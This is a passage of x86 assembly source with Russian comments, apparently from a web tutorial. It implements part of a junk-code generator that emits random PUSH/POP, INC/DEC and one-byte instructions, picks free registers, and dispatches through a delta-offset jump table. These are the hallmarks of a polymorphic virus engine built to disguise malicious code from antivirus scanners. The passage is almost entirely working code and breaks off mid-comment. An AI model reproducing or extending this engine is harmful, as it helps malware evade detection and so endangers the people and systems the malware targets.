call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,58h; Добавляем к al — 58h
stosb; И опять кладём al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции PUSH/POP:
; .........................
; push eax
; mov eax,2345
; pop ecx
; .........................
sub ecx,edx; Уменьшаем счётчик на edx
sub ecx,3; Уменьшаем счётчик на 3
ret; Возврат из подпрограммы

;----[Генерация инструкций PUSH — 0x68,0x58..0x5f]-------------------------;

__push_imm32:
mov eax,10; Генерируем СЧ в
call brandom32; диапазоне 0..9
mov edx,eax; Помещаем в edx — eax
add al,6; Добавляем к al — 6

cmp eax,ecx; Если длина генерируемых
jle __g17__; инструкций меньше, то
ret; Возврат из подпрограммы
__g17__:
mov al,68h; Кладём в al — 68h
stosb; Помещаем al в буфер
xor eax,eax; Обнуляем eax
dec eax; Теперь в eax — 0ffffffffh
call brandom32; Генерируем СЧ
stosd; Кладём его в буфер

push ecx; Сохраняем ecx в стэке
mov ecx,edx; Кладём в ecx — edx
call garbage; Генерируем серию мусора
pop ecx; Восстанавливаем ecx из
; стэка

call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,58h; Добавляем к al — 58h
stosb; И опять кладём al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции PUSH/POP:
; .........................
; push eax
; add eax,42346
; pop ecx
; .........................
sub ecx,edx; Уменьшаем счётчик на edx
sub ecx,6; Уменьшаем счётчик на 6
ret; Возврат из подпрограммы

;----[Генерация однобайтовых инструкций — 0x40..0x4f;0x0f2;0x0f3...]-------;

__one_byte:
mov eax,3; Генерируем случайное число
call brandom32; в диапазоне 0..2

cmp al,1; Если число = 1, то
jne __not_inc_; генерируем инструкцию INC

call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,40h; Добавляем к al — 40h
stosb; Помещаем al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции INC:
; .........................
; inc eax
; inc ebp
; .........................
jmp __q__; Идём на выход
__not_inc_:

cmp al,2; Если число = 2, то
jne __not_dec_; Идём на выход

call free_reg; Вызываем подпрограмму
; получения свободных
; регистров
add al,48h; Добавляем к al — 48h
stosb; Помещаем al в буфер
; В итоге у нас получается
; случайно выбранная
; инструкции DEC:
; .........................
; dec eax
; .........................
jmp __q__; Идём на выход
__not_dec_:

lea esi,[ebp+__1_byte_opcode]; Кладём в esi указатель на
; таблицу однобайтных
; инструкций
mov eax,8; Генерируем случайное число
call brandom32; в диапазоне 0..7
add esi,eax; Прибавляем к esi — eax
movsb; Помещаем инструкцию
; из таблицы в буфер
; В итоге у нас получается
; случайно выбранная
; инструкция из таблицы:
; ........................
; cld
; nop
__q__:; ........................
dec ecx; Уменьшаем ecx на единицу
ret; Возврат из подпрограммы

;----[Подпрограмма получающая случайный свободный регистр]-----------------;

free_reg:
; Подпрограмма получения
; свободного регистра

push edx ecx; Сохраняем в стэке edx, ecx
another: ;

call rnd_reg ;
bt ebx, eax; Определяем используемый
jc another; случайный регистр

pop ecx edx; Восстанавливаем ecx, edx
ret; Возврат из подпрограммы

;----[Подпрограмма получающая случайный регистр]---------------------------;

rnd_reg:
; Подпрограмма получения
; случайного регистра

mov eax,8; Получаем случайное число
call brandom32; в диапазоне 0..7
ret; Возврат из подпрограммы

;----[Таблица смещений на подпрограммы]------------------------------------;

mega_table:
dw __x87 -__st__ ;
dw __mov_r32_r32 -__st__;
dw __push_r32 -__st__;
dw __push_r32_2 -__st__;
dw __push_imm32 -__st__;
dw __shl_r32_imm8 -__st__;
dw __cmp_r32_r32 -__st__ ;
dw __xor_r32_r32 -__st__ ;
dw __one_byte -__st__ ;
dw __mov_r32_imm32 -__st__ ;
dw __jxx_short -__st__; Таблица
dw __jxx_near -__st__; относительных
dw __add_r32_imm32 -__st__; смещений от метки
dw __jmp_short -__st__; delta_offset
dw __lea_r32_imm32 -__st__ ;
dw __test_r32_r32 -__st__ ;
dw __not_r32 -__st__ ;
dw __xadd_r32_r32 -__st__ ;
dw __mov_r16_imm16 -__st__ ;
dw __cmova_r32_r32 -__st__;
dw __call_near -__st__ ;

;----[Таблица однобайтовых опкодов]----------------------------------------;

__1_byte_opcode:
std ;
cld; Таблица однобайтовых
nop; инструкций
clc ;
stc ;
cmc ;
db 0f2h; rep
db 0f3h; repnz

;----[Таблица трёхба
Нравится
Не нравится

Комментарии

Нет комментариев. Ваш будет первым!